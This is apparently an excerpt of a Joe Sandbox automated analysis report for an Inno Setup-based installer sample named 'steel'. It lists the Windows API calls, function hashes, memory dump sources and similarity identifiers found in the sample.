• Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
• Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
• Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,021524A0), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0002043C,000000FC,00409960), ref: 0040AB15
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0002043C,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3757039580-3001827809
                                                                                            • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                            • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                            • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0002043C,000000FC,00409960), ref: 0040AB15
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000), ref: 00409A70
                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8), ref: 00409AA4
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0002043C,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3586484885-3001827809
                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8,00000000), ref: 00409A70
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,021524A0,00409AD8), ref: 00409AA4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,021524A0), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                            • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                            • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                            • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                            • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                            • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                            • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                            • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

Control-flow Graph

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
• GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
• Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
• Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
• Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

Control-flow Graph

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
• Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

Control-flow Graph

APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID:
• API String ID: 296031713-0
• Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
• Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

Control-flow Graph

APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406FAA
• LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
• Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Control-flow Graph

APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
• Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
• Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021503AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
• Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
• Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766

APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_steel.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
